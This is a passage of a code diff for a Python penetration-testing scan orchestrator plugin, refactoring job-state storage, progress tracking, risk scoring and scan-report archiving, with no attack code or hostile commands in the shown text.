PentesterApi01Plugin._get_job_write_guarantees(self)["mode"], + }) + + persisted = job_specs if isinstance(job_specs, dict) else dict(job_specs) + persisted["job_revision"] = current_revision + 1 + normalized = PentesterApi01Plugin._get_job_state_repository(self).put_job(job_id, persisted) + if isinstance(job_specs, dict) and isinstance(normalized, dict) and normalized is not job_specs: + job_specs.clear() + job_specs.update(normalized) + return job_specs + return normalized + + def _delete_job_record(self, job_id): + """Delete a job record from CStore.""" + PentesterApi01Plugin._get_job_state_repository(self).delete_job(job_id) return @@ -1162,37 +1195,57 @@ def _close_job(self, job_id, canceled=False): total_scanned = 0 total_ports = 0 all_open = set() + scan_type = "network" for w in local_workers_pre.values(): total_scanned += len(w.state.get("ports_scanned", [])) total_ports += len(w.initial_ports) all_open.update(w.state.get("open_ports", [])) - job_specs_pre = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + if w.state.get("scan_type") == "webapp": + scan_type = "webapp" + job_specs_pre = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) pass_nr = job_specs_pre.get("job_pass", 1) if isinstance(job_specs_pre, dict) else 1 + worker_entry_pre = {} + if isinstance(job_specs_pre, dict): + worker_entry_pre = (job_specs_pre.get("workers") or {}).get(self.ee_addr) or {} + assignment_revision = PentesterApi01Plugin._get_worker_assignment_revision(worker_entry_pre) + live_meta = getattr(self, "_execution_live_meta", {}).get(job_id, {}) + started_at = live_meta.get("started_at", self.time()) + first_seen_live_at = live_meta.get("first_seen_live_at", started_at) + total_phases = 5 done_progress = WorkerProgress( job_id=job_id, worker_addr=self.ee_addr, pass_nr=pass_nr, + assignment_revision_seen=assignment_revision, progress=100.0, phase="done", + scan_type=scan_type, + phase_index=total_phases, + total_phases=total_phases, ports_scanned=total_scanned, ports_total=total_ports, open_ports_found=sorted(all_open), completed_tests=[], updated_at=self.time(), + started_at=started_at, + first_seen_live_at=first_seen_live_at, + last_seen_at=self.time(), + finished=True, ) - self.chainstore_hset( - hkey=f"{self.cfg_instance_id}:live", - key=f"{job_id}:{self.ee_addr}", - value=done_progress.to_dict(), - ) + PentesterApi01Plugin._get_job_state_repository(self).put_live_progress_model(done_progress) local_workers = self.scan_jobs.pop(job_id, None) + self._forget_execution_identity(job_id) if local_workers: + # Resolve worker class for aggregation field registry + first_worker = next(iter(local_workers.values()), None) + worker_cls = type(first_worker) if first_worker else None + local_reports = { local_worker_id: local_worker.get_status() for local_worker_id, local_worker in local_workers.items() } - report = self._get_aggregated_report(local_reports) + report = self._get_aggregated_report(local_reports, worker_cls=worker_cls) if report: # Replace generically-merged scan_metrics with properly summed metrics thread_metrics = [r.get("scan_metrics") for r in local_reports.values() if r.get("scan_metrics")] @@ -1217,7 +1270,7 @@ def _close_job(self, job_id, canceled=False): thread_scan_metrics[lwid] = entry if thread_scan_metrics: report["thread_scan_metrics"] = thread_scan_metrics - raw_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + raw_job_specs = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) if raw_job_specs is None: self.P(f"Job {job_id} no longer present in chainstore; skipping close sync.", color='r') return @@ -1261,7 +1314,7 @@ def _close_job(self, job_id, canceled=False): worker_entry["result"] = report # Re-read job_specs to avoid overwriting concurrent updates (e.g., pass_reports) - fresh_job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + fresh_job_specs = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) if fresh_job_specs and isinstance(fresh_job_specs, dict): fresh_job_specs["workers"][self.ee_addr] = worker_entry job_specs = fresh_job_specs @@ -1271,15 +1324,10 @@ def _close_job(self, job_id, canceled=False): job_id, self.json_dumps(job_specs, indent=2) )) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="close_job") # Audit: scan completed - nr_findings = 0 - for port_data in report.get("service_info", {}).values(): - if isinstance(port_data, dict): - for method_data in port_data.values(): - if isinstance(method_data, dict): - nr_findings += len(method_data.get("findings", [])) + nr_findings = self._count_all_findings(report) self._log_audit_event("scan_completed", { "job_id": job_id, "target": job_specs.get("target"), @@ -1310,7 +1358,7 @@ def _maybe_stop_canceled_jobs(self): return for job_id in list(self.scan_jobs): - raw = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + raw = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) if not raw: continue _, job_specs = self._normalize_job_record(job_id, raw) @@ -1334,7 +1382,7 @@ def _maybe_close_jobs(self): all_workers_done = True any_canceled_worker = False reports = {} - job : PentestLocalWorker = None + job = None initiator = None nr_local_workers = len(local_workers) for local_worker_id, job in local_workers.items(): @@ -1376,393 +1424,36 @@ def _maybe_close_jobs(self): return - def _compute_risk_score(self, aggregated_report): - """ - Compute a 0-100 risk score from an aggregated scan report. + def _build_job_archive(self, job_key, job_specs): + """Build archive, write to R1FS, prune CStore. Idempotent on failure. - The score combines four components: - A. Finding severity (weighted by confidence) - B. Open ports (diminishing returns) - C. Attack surface breadth (distinct protocols) - D. Default credentials penalty + Called when job reaches FINALIZED or STOPPED state. Builds the complete + archive, writes it to R1FS, then prunes CStore to a lightweight stub. + + Safety invariant: never prune CStore until archive CID is confirmed written. Parameters ---------- - aggregated_report : dict - Aggregated report with service_info, web_tests_info, correlation_findings, - open_ports, and port_protocols. - - Returns - ------- - dict - ``{"score": int, "breakdown": dict}`` + job_key : str + CStore key for this job. + job_specs : dict + Full CStore job state. """ - import math - - findings_score = 0.0 - finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} - cred_count = 0 - - def process_findings(findings_list): - nonlocal findings_score, cred_count - for finding in findings_list: - if not isinstance(finding, dict): - continue - severity = finding.get("severity", "INFO").upper() - confidence = finding.get("confidence", "firm").lower() - weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) - multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) - findings_score += weight * multiplier - if severity in finding_counts: - finding_counts[severity] += 1 - title = finding.get("title", "") - if isinstance(title, str) and "default credential accepted" in title.lower(): - cred_count += 1 - - # A. Iterate service_info findings - service_info = aggregated_report.get("service_info", {}) - for port_key, probes in service_info.items(): - if not isinstance(probes, dict): - continue - for probe_name, probe_data in probes.items(): - if not isinstance(probe_data, dict): - continue - process_findings(probe_data.get("findings", [])) - - # A. Iterate web_tests_info findings - web_tests_info = aggregated_report.get("web_tests_info", {}) - for port_key, tests in web_tests_info.items(): - if not isinstance(tests, dict): - continue - for test_name, test_data in tests.items(): - if not isinstance(test_data, dict): - continue - process_findings(test_data.get("findings", [])) + job_id = job_specs.get("job_id", job_key) - # A. Iterate correlation_findings - correlation_findings = aggregated_report.get("correlation_findings", []) - if isinstance(correlation_findings, list): - process_findings(correlation_findings) - - # B. Open ports — diminishing returns: 15 × (1 - e^(-ports/8)) - open_ports = aggregated_report.get("open_ports", []) - nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 - open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) - - # C. Attack surface breadth — distinct protocols: 10 × (1 - e^(-protocols/4)) - port_protocols = aggregated_report.get("port_protocols", {}) - nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 - breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) - - # D. Default credentials penalty - credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) - - # Raw total - raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty - - # Normalize to 0-100 via logistic curve - score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) - score = max(0, min(100, score)) - - return { - "score": score, - "breakdown": { - "findings_score": round(findings_score, 1), - "open_ports_score": round(open_ports_score, 1), - "breadth_score": round(breadth_score, 1), - "credentials_penalty": credentials_penalty, - "raw_total": round(raw_total, 1), - "finding_counts": finding_counts, - }, - } - - def _compute_risk_and_findings(self, aggregated_report): - """ - Compute risk score AND extract flat findings in a single walk. - - Extends _compute_risk_score to also produce a flat list of enriched - findings from the nested service_info/web_tests_info/correlation structure. - - Parameters - ---------- - aggregated_report : dict - Aggregated report with service_info, web_tests_info, etc. - - Returns - ------- - tuple[dict, list] - (risk_result, flat_findings) where risk_result is {"score": int, "breakdown": dict} - and flat_findings is a list of enriched finding dicts. - """ - import hashlib - import math - - findings_score = 0.0 - finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} - cred_count = 0 - flat_findings = [] - - port_protocols = aggregated_report.get("port_protocols") or {} - - def process_findings(findings_list, port, probe_name, category): - nonlocal findings_score, cred_count - for finding in findings_list: - if not isinstance(finding, dict): - continue - severity = finding.get("severity", "INFO").upper() - confidence = finding.get("confidence", "firm").lower() - weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) - multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) - findings_score += weight * multiplier - if severity in finding_counts: - finding_counts[severity] += 1 - title = finding.get("title", "") - if isinstance(title, str) and "default credential accepted" in title.lower(): - cred_count += 1 - - # Build deterministic finding_id - canon_title = (finding.get("title") or "").lower().strip() - cwe = finding.get("cwe_id", "") - id_input = f"{port}:{probe_name}:{cwe}:{canon_title}" - finding_id = hashlib.sha256(id_input.encode()).hexdigest()[:16] - - protocol = port_protocols.get(str(port), "unknown") - - flat_findings.append({ - "finding_id": finding_id, - **{k: v for k, v in finding.items()}, - "port": port, - "protocol": protocol, - "probe": probe_name, - "category": category, - }) - - def parse_port(port_key): - """Extract integer port from keys like '80/tcp' or '80'.""" - try: - return int(str(port_key).split("/")[0]) - except (ValueError, IndexError): - return 0 - - # Walk service_info - service_info = aggregated_report.get("service_info", {}) - for port_key, probes in service_info.items(): - if not isinstance(probes, dict): - continue - port = parse_port(port_key) - for probe_name, probe_data in probes.items(): - if not isinstance(probe_data, dict): - continue - process_findings(probe_data.get("findings", []), port, probe_name, "service") - - # Walk web_tests_info - web_tests_info = aggregated_report.get("web_tests_info", {}) - for port_key, tests in web_tests_info.items(): - if not isinstance(tests, dict): - continue - port = parse_port(port_key) - for test_name, test_data in tests.items(): - if not isinstance(test_data, dict): - continue - process_findings(test_data.get("findings", []), port, test_name, "web") - - # Walk correlation_findings - correlation_findings = aggregated_report.get("correlation_findings", []) - if isinstance(correlation_findings, list): - process_findings(correlation_findings, 0, "_correlation", "correlation") - - # B. Open ports — diminishing returns - open_ports = aggregated_report.get("open_ports", []) - nr_ports = len(open_ports) if isinstance(open_ports, list) else 0 - open_ports_score = 15.0 * (1.0 - math.exp(-nr_ports / 8.0)) - - # C. Attack surface breadth - nr_protocols = len(set(port_protocols.values())) if isinstance(port_protocols, dict) else 0 - breadth_score = 10.0 * (1.0 - math.exp(-nr_protocols / 4.0)) - - # D. Default credentials penalty - credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) - - # Deduplicate CVE findings: when the same CVE appears on the same port - # from different probes (behavioral + version-based), keep the higher - # confidence detection and drop the duplicate. - import re as _re_dedup - CONFIDENCE_RANK = {"certain": 3, "firm": 2, "tentative": 1} - cve_best = {} # (cve_id, port) -> index of best finding - drop_indices = set() - for idx, f in enumerate(flat_findings): - title = f.get("title", "") - m = _re_dedup.search(r"CVE-\d{4}-\d+", title) - if not m: - continue - cve_id = m.group(0) - port = f.get("port", 0) - key = (cve_id, port) - conf = CONFIDENCE_RANK.get(f.get("confidence", "tentative"), 0) - if key in cve_best: - prev_idx = cve_best[key] - prev_conf = CONFIDENCE_RANK.get(flat_findings[prev_idx].get("confidence", "tentative"), 0) - if conf > prev_conf: - drop_indices.add(prev_idx) - cve_best[key] = idx - else: - drop_indices.add(idx) - else: - cve_best[key] = idx - - if drop_indices: - flat_findings = [f for i, f in enumerate(flat_findings) if i not in drop_indices] - # Recalculate scores after dedup - findings_score = 0.0 - finding_counts = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0, "INFO": 0} - cred_count = 0 - for f in flat_findings: - severity = f.get("severity", "INFO").upper() - confidence = f.get("confidence", "firm").lower() - weight = RISK_SEVERITY_WEIGHTS.get(severity, 0) - multiplier = RISK_CONFIDENCE_MULTIPLIERS.get(confidence, 0.5) - findings_score += weight * multiplier - if severity in finding_counts: - finding_counts[severity] += 1 - title = f.get("title", "") - if isinstance(title, str) and "default credential accepted" in title.lower(): - cred_count += 1 - credentials_penalty = min(cred_count * RISK_CRED_PENALTY_PER, RISK_CRED_PENALTY_CAP) - - raw_total = findings_score + open_ports_score + breadth_score + credentials_penalty - score = int(round(100.0 * (2.0 / (1.0 + math.exp(-RISK_SIGMOID_K * raw_total)) - 1.0))) - score = max(0, min(100, score)) - - risk_result = { - "score": score, - "breakdown": { - "findings_score": round(findings_score, 1), - "open_ports_score": round(open_ports_score, 1), - "breadth_score": round(breadth_score, 1), - "credentials_penalty": credentials_penalty, - "raw_total": round(raw_total, 1), - "finding_counts": finding_counts, - }, - } - return risk_result, flat_findings - - def _count_services(self, service_info): - """Count ports that have at least one identified service. - - Parameters - ---------- - service_info : dict - Port-keyed service info dict from aggregated scan data. - - Returns - ------- - int - Number of ports with detected services. - """ - if not isinstance(service_info, dict): - return 0 - count = 0 - for port_key, probes in service_info.items(): - if isinstance(probes, dict) and len(probes) > 0: - count += 1 - return count - - SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4} - CONFIDENCE_ORDER = {"certain": 0, "firm": 1, "tentative": 2} - - def _compute_ui_aggregate(self, passes, latest_aggregated): - """Compute pre-aggregated view for frontend from pass reports. - - Parameters - ---------- - passes : list - List of pass report dicts (PassReport.to_dict()). - latest_aggregated : dict - AggregatedScanData dict for the latest pass. - - Returns - ------- - UiAggregate - """ - from collections import Counter - - latest = passes[-1] - agg = latest_aggregated - findings = latest.get("findings", []) or [] - - # Severity breakdown - findings_count = dict(Counter(f.get("severity", "INFO") for f in findings)) - - # Top findings: CRITICAL + HIGH, sorted by severity then confidence, capped at 10 - crit_high = [f for f in findings if f.get("severity") in ("CRITICAL", "HIGH")] - crit_high.sort(key=lambda f: ( - self.SEVERITY_ORDER.get(f.get("severity"), 9), - self.CONFIDENCE_ORDER.get(f.get("confidence"), 9), - )) - top_findings = crit_high[:10] - - # Finding timeline: track persistence across passes (continuous monitoring) - finding_timeline = {} - for p in passes: - pass_nr = p.get("pass_nr", 0) - for f in (p.get("findings") or []): - fid = f.get("finding_id") - if not fid: - continue - if fid not in finding_timeline: - finding_timeline[fid] = {"first_seen": pass_nr, "last_seen": pass_nr, "pass_count": 1} - else: - finding_timeline[fid]["last_seen"] = pass_nr - finding_timeline[fid]["pass_count"] += 1 - - return UiAggregate( - total_open_ports=sorted(set(agg.get("open_ports", []))), - total_services=self._count_services(agg.get("service_info", {})), - total_findings=len(findings), - findings_count=findings_count if findings_count else None, - top_findings=top_findings if top_findings else None, - finding_timeline=finding_timeline if finding_timeline else None, - latest_risk_score=latest.get("risk_score"), - latest_risk_breakdown=latest.get("risk_breakdown"), - latest_quick_summary=latest.get("quick_summary"), - worker_activity=[ - { - "id": addr, - "start_port": w["start_port"], - "end_port": w["end_port"], - "open_ports": w.get("open_ports", []), - } - for addr, w in (latest.get("worker_reports") or {}).items() - ] or None, - ) - - def _build_job_archive(self, job_key, job_specs): - """Build archive, write to R1FS, prune CStore. Idempotent on failure. - - Called when job reaches FINALIZED or STOPPED state. Builds the complete - archive, writes it to R1FS, then prunes CStore to a lightweight stub. - - Safety invariant: never prune CStore until archive CID is confirmed written. - - Parameters - ---------- - job_key : str - CStore key for this job. - job_specs : dict - Full CStore job state. - """ - job_id = job_specs.get("job_id", job_key) - - # 1. Fetch job config - job_config = self.r1fs.get_json(job_specs.get("job_config_cid")) - if job_config is None: - self.P(f"Cannot build archive for {job_id}: job config not found in R1FS", color='r') - return + # 1. Fetch job config and redact credentials for archive storage + artifacts = PentesterApi01Plugin._get_artifact_repository(self) + job_config = artifacts.get_job_config(job_specs) + if job_config is None: + self.P(f"Cannot build archive for {job_id}: job config not found in R1FS", color='r') + return + if job_config.get("redact_credentials", True): + job_config = self._redact_job_config(job_config) # 2. Fetch all pass reports passes = [] for ref in job_specs.get("pass_reports", []): - pass_data = self.r1fs.get_json(ref["report_cid"]) + pass_data = artifacts.get_pass_report(ref["report_cid"]) if pass_data is None: self.P(f"Cannot build archive for {job_id}: pass {ref['pass_nr']} not found", color='r') return @@ -1774,19 +1465,20 @@ def _build_job_archive(self, job_key, job_specs): # 3. Fetch latest aggregated report for UI aggregate computation latest_agg_cid = passes[-1].get("aggregated_report_cid") - latest_aggregated = self.r1fs.get_json(latest_agg_cid) if latest_agg_cid else None + latest_aggregated = artifacts.get_json(latest_agg_cid) if latest_agg_cid else None if not latest_aggregated: self.P(f"Cannot build archive for {job_id}: latest aggregated report not found in R1FS", color='r') return # 4. Compute UI aggregate from passes + latest aggregated data - ui_aggregate = self._compute_ui_aggregate(passes, latest_aggregated) + ui_aggregate = self._compute_ui_aggregate(passes, latest_aggregated, job_config=job_config) # 5. Compose archive date_completed = self.time() duration = date_completed - job_specs.get("date_created", date_completed) archive = JobArchive( + archive_version=JOB_ARCHIVE_VERSION, job_id=job_id, job_config=job_config, timeline=job_specs.get("timeline", []), @@ -1799,13 +1491,22 @@ def _build_job_archive(self, job_key, job_specs): ) # 6. Write archive to R1FS - job_cid = self.r1fs.add_json(archive.to_dict(), show_logs=False) + job_cid = artifacts.put_archive(archive, show_logs=False) if not job_cid: self.P(f"Archive write to R1FS failed for {job_id}", color='r') return # 7. Verify CID is retrievable - if self.r1fs.get_json(job_cid) is None: + from .services.resilience import run_bounded_retry + archive_verify_retries = max(int(getattr(self, "cfg_archive_verify_retries", 1) or 1), 1) + verified_archive = run_bounded_retry( + self, + "archive_verify", + archive_verify_retries, + lambda: artifacts.get_json(job_cid), + is_success=lambda payload: isinstance(payload, dict) and payload.get("job_id") == job_id, + ) + if verified_archive is None: self.P(f"Archive CID {job_cid} not retrievable after write for {job_id}", color='r') return @@ -1814,6 +1515,8 @@ def _build_job_archive(self, job_key, job_specs): job_id=job_id, job_status=job_specs.get("job_status", JOB_STATUS_FINALIZED), target=job_specs.get("target", ""), + scan_type=job_specs.get("scan_type", "network"), + target_url=job_specs.get("target_url", ""), task_name=job_specs.get("task_name", ""), risk_score=job_specs.get("risk_score", 0), run_mode=job_specs.get("run_mode", RUN_MODE_SINGLEPASS), @@ -1829,7 +1532,7 @@ def _build_job_archive(self, job_key, job_specs): job_cid=job_cid, job_config_cid=job_specs.get("job_config_cid", ""), ) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=stub.to_dict()) + PentesterApi01Plugin._write_job_record(self, job_key, stub.to_dict(), context="archive_prune") self.P(f"Job {job_id} archived. CID={job_cid}, CStore pruned to stub.") # 9. Clean up individual pass report CIDs (best-effort, after commit) @@ -1837,314 +1540,15 @@ def _build_job_archive(self, job_key, job_specs): cid = ref.get("report_cid") if cid: try: - success = self.r1fs.delete_file(cid, show_logs=False, raise_on_error=False) + success = artifacts.delete(cid, show_logs=False, raise_on_error=False) if not success: self.P(f"delete_file returned False for pass report CID {cid}", color='y') except Exception as e: self.P(f"Failed to clean up pass report CID {cid}: {e}", color='y') def _maybe_finalize_pass(self): - """ - Launcher finalizes completed passes and orchestrates continuous monitoring. - - For all jobs, this method: - 1. Detects when all workers have finished the current pass - 2. Records pass completion in pass_reports - - For CONTINUOUS_MONITORING jobs, additionally: - 3. Schedules the next pass after monitor_interval - 4. Resets all workers when it's time to start the next pass - - Only the launcher node executes this logic. - - Returns - ------- - None - """ - all_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) - - for job_key, job_specs in all_jobs.items(): - normalized_key, job_specs = self._normalize_job_record(job_key, job_specs) - if normalized_key is None: - continue - - # Only launcher manages pass finalization - is_launcher = job_specs.get("launcher") == self.ee_addr - if not is_launcher: - continue - - workers = job_specs.get("workers", {}) - if not workers: - continue - - run_mode = job_specs.get("run_mode", RUN_MODE_SINGLEPASS) - job_status = job_specs.get("job_status", JOB_STATUS_RUNNING) - all_finished = all(w.get("finished") for w in workers.values()) - next_pass_at = job_specs.get("next_pass_at") - job_pass = job_specs.get("job_pass", 1) - job_id = job_specs.get("job_id") - pass_reports = job_specs.setdefault("pass_reports", []) - - # Skip jobs that are already finalized, stopped, or mid-finalization - if job_status in (JOB_STATUS_FINALIZED, JOB_STATUS_STOPPED): - # Stuck recovery: if no job_cid, the archive build failed previously — retry - # But only if there are pass reports to build from (hard-stopped jobs - # that never completed a pass have nothing to archive) - if not job_specs.get("job_cid") and pass_reports: - self.P(f"[STUCK RECOVERY] {job_id} is {job_status} but has no job_cid — retrying archive build", color='y') - self._build_job_archive(job_id, job_specs) - continue - if job_status in (JOB_STATUS_COLLECTING, JOB_STATUS_ANALYZING, JOB_STATUS_FINALIZING): - continue - - if all_finished and next_pass_at is None: - # ═══════════════════════════════════════════════════ - # STATE: All peers completed current pass - # ═══════════════════════════════════════════════════ - pass_date_started = self._get_timeline_date(job_specs, "pass_started") or self._get_timeline_date(job_specs, "created") - pass_date_completed = self.time() - now_ts = pass_date_completed - - # --- COLLECTING: merge worker reports --- - job_specs["job_status"] = JOB_STATUS_COLLECTING - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - - # 1. AGGREGATE ONCE — fetch node reports from R1FS and merge - node_reports = self._collect_node_reports(workers) - aggregated = self._get_aggregated_report(node_reports) if node_reports else {} - - # 2. RISK SCORE + FLAT FINDINGS (single walk) - risk_score = 0 - flat_findings = [] - risk_result = None - if aggregated: - risk_result, flat_findings = self._compute_risk_and_findings(aggregated) - risk_score = risk_result["score"] - job_specs["risk_score"] = risk_score - self.P(f"Risk score for job {job_id} pass {job_pass}: {risk_score}/100") - - # --- ANALYZING: LLM analysis --- - job_config = self._get_job_config(job_specs) - llm_text = None - summary_text = None - if self.cfg_llm_agent_api_enabled and aggregated: - job_specs["job_status"] = JOB_STATUS_ANALYZING - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - llm_text = self._run_aggregated_llm_analysis(job_id, aggregated, job_config) - summary_text = self._run_quick_summary_analysis(job_id, aggregated, job_config) - - # 4. LLM FAILURE HANDLING - llm_failed = True if (self.cfg_llm_agent_api_enabled and (llm_text is None or summary_text is None)) else None - if llm_failed: - self._emit_timeline_event( - job_specs, "llm_failed", - f"LLM analysis unavailable for pass {job_pass}", - meta={"pass_nr": job_pass} - ) - - # 5. BUILD WORKER METADATA from already-fetched node_reports - worker_metas = {} - for addr, report in node_reports.items(): - nr_findings = 0 - for probes in (report.get("service_info") or {}).values(): - if isinstance(probes, dict): - for probe_data in probes.values(): - if isinstance(probe_data, dict): - nr_findings += len(probe_data.get("findings", [])) - for tests in (report.get("web_tests_info") or {}).values(): - if isinstance(tests, dict): - for test_data in tests.values(): - if isinstance(test_data, dict): - nr_findings += len(test_data.get("findings", [])) - nr_findings += len(report.get("correlation_findings") or []) - - worker_metas[addr] = WorkerReportMeta( - report_cid=workers[addr].get("report_cid", ""), - start_port=report.get("start_port", 0), - end_port=report.get("end_port", 0), - ports_scanned=report.get("ports_scanned", 0), - open_ports=report.get("open_ports", []), - nr_findings=nr_findings, - node_ip=report.get("node_ip", ""), - ).to_dict() - - # 6. STORE aggregated report as separate CID - aggregated_report_cid = None - if aggregated: - aggregated_data = AggregatedScanData.from_dict(aggregated).to_dict() - aggregated_report_cid = self.r1fs.add_json(aggregated_data, show_logs=False) - if not aggregated_report_cid: - self.P(f"Failed to store aggregated report for pass {job_pass} in R1FS", color='r') - continue # skip pass finalization, retry next loop - - # 7. ATTESTATION — compute but don't emit timeline yet (inserted at correct point below) - redmesh_test_attestation = None - should_submit_attestation = True - if run_mode == RUN_MODE_CONTINUOUS_MONITORING: - last_attestation_at = job_specs.get("last_attestation_at") - min_interval = self.cfg_attestation_min_seconds_between_submits - if last_attestation_at is not None and now_ts - last_attestation_at < min_interval: - elapsed = round(now_ts - last_attestation_at) - self.P( - f"[ATTESTATION] Skipping test attestation for job {job_id}: " - f"last submitted {elapsed}s ago, min interval is {min_interval}s", - color='y' - ) - should_submit_attestation = False - - if should_submit_attestation: - try: - # Collect node IPs from worker reports for attestation - attestation_node_ips = [ - r.get("node_ip") for r in node_reports.values() - if r.get("node_ip") - ] - redmesh_test_attestation = self._submit_redmesh_test_attestation( - job_id=job_id, - job_specs=job_specs, - workers=workers, - vulnerability_score=risk_score, - node_ips=attestation_node_ips, - ) - if redmesh_test_attestation is not None: - job_specs["last_attestation_at"] = now_ts - except Exception as exc: - import traceback - self.P( - f"[ATTESTATION] Failed to submit test attestation for job {job_id}: {exc}\n" - f" Type: {type(exc).__name__}\n" - f" Args: {exc.args}\n" - f" Traceback:\n{traceback.format_exc()}", - color='r' - ) - - # 8. MERGE SCAN METRICS across nodes + store per-node/per-thread metrics - worker_scan_metrics = {} - for addr, report in node_reports.items(): - if report.get("scan_metrics"): - entry = {"scan_metrics": report["scan_metrics"]} - # Attach per-thread breakdown if available - if report.get("thread_scan_metrics"): - entry["threads"] = report["thread_scan_metrics"] - worker_scan_metrics[addr] = entry - node_metrics = [e["scan_metrics"] for e in worker_scan_metrics.values()] - pass_metrics = None - if node_metrics: - pass_metrics = node_metrics[0] if len(node_metrics) == 1 else self._merge_worker_metrics(node_metrics) - - # 9. COMPOSE PassReport - pass_report = PassReport( - pass_nr=job_pass, - date_started=pass_date_started, - date_completed=pass_date_completed, - duration=round(pass_date_completed - pass_date_started, 2) if pass_date_started else 0, - aggregated_report_cid=aggregated_report_cid or "", - worker_reports=worker_metas, - risk_score=risk_score, - risk_breakdown=risk_result["breakdown"] if risk_result else None, - llm_analysis=llm_text, - quick_summary=summary_text, - llm_failed=llm_failed, - findings=flat_findings if flat_findings else None, - scan_metrics=pass_metrics, - worker_scan_metrics=worker_scan_metrics if worker_scan_metrics else None, - redmesh_test_attestation=redmesh_test_attestation, - ) - - # 10. STORE PassReport as single CID - pass_report_cid = self.r1fs.add_json(pass_report.to_dict(), show_logs=False) - if not pass_report_cid: - self.P(f"Failed to store pass report for pass {job_pass} in R1FS", color='r') - continue # skip — don't append partial state to CStore - - # 11. UPDATE CStore with lightweight PassReportRef - pass_reports.append(PassReportRef(job_pass, pass_report_cid, risk_score).to_dict()) - - # --- FINALIZING: writing archive --- - job_specs["job_status"] = JOB_STATUS_FINALIZING - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - - # Handle SINGLEPASS - set FINALIZED, build archive, prune CStore - if run_mode == RUN_MODE_SINGLEPASS: - job_specs["job_status"] = JOB_STATUS_FINALIZED - self._emit_timeline_event(job_specs, "scan_completed", "Scan completed") - if redmesh_test_attestation is not None: - self._emit_timeline_event( - job_specs, "blockchain_submit", - "Job-finished attestation submitted", - actor_type="system", - meta={**redmesh_test_attestation, "network": "base-sepolia"} - ) - self.P(f"[SINGLEPASS] Job {job_id} complete. Status set to FINALIZED.") - self._emit_timeline_event(job_specs, "finalized", "Job finalized") - self._build_job_archive(job_key, job_specs) - self._clear_live_progress(job_id, list(workers.keys())) - continue - - # CONTINUOUS_MONITORING logic below - - # Check if soft stop was scheduled — build archive and prune CStore - if job_status == JOB_STATUS_SCHEDULED_FOR_STOP: - job_specs["job_status"] = JOB_STATUS_STOPPED - self._emit_timeline_event(job_specs, "scan_completed", f"Scan completed (pass {job_pass})") - if redmesh_test_attestation is not None: - self._emit_timeline_event( - job_specs, "blockchain_submit", - f"Test attestation submitted (pass {job_pass})", - actor_type="system", - meta={**redmesh_test_attestation, "network": "base-sepolia"} - ) - self.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Status set to STOPPED (soft stop was scheduled)") - self._emit_timeline_event(job_specs, "stopped", "Job stopped") - self._build_job_archive(job_key, job_specs) - self._clear_live_progress(job_id, list(workers.keys())) - continue - - # Schedule next pass — attestation event goes with pass_completed - if redmesh_test_attestation is not None: - self._emit_timeline_event( - job_specs, "blockchain_submit", - f"Test attestation submitted (pass {job_pass})", - actor_type="system", - meta={**redmesh_test_attestation, "network": "base-sepolia"} - ) - interval = job_config.get("monitor_interval", self.cfg_monitor_interval) - jitter = random.uniform(0, self.cfg_monitor_jitter) - job_specs["next_pass_at"] = self.time() + interval + jitter - self._emit_timeline_event(job_specs, "pass_completed", f"Pass {job_pass} completed") - - self.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Next pass in {interval}s (+{jitter:.1f}s jitter)") - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - self._clear_live_progress(job_id, list(workers.keys())) - - # Clear from completed_jobs_reports to allow relaunch - self.completed_jobs_reports.pop(job_id, None) - if job_id in self.lst_completed_jobs: - self.lst_completed_jobs.remove(job_id) - - elif run_mode == RUN_MODE_CONTINUOUS_MONITORING and all_finished and next_pass_at and self.time() >= next_pass_at: - # ═══════════════════════════════════════════════════ - # STATE: Interval elapsed, start next pass - # ═══════════════════════════════════════════════════ - job_specs["job_pass"] = job_pass + 1 - job_specs["next_pass_at"] = None - self._emit_timeline_event(job_specs, "pass_started", f"Pass {job_pass + 1} started") - - for addr in workers: - workers[addr]["finished"] = False - workers[addr]["result"] = None - workers[addr]["report_cid"] = None - # end for each worker reset - - self.P(f"[CONTINUOUS] Starting pass {job_pass + 1} for job {job_id}", boxed=True) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - - # Clear local tracking to allow relaunch - self.completed_jobs_reports.pop(job_id, None) - if job_id in self.lst_completed_jobs: - 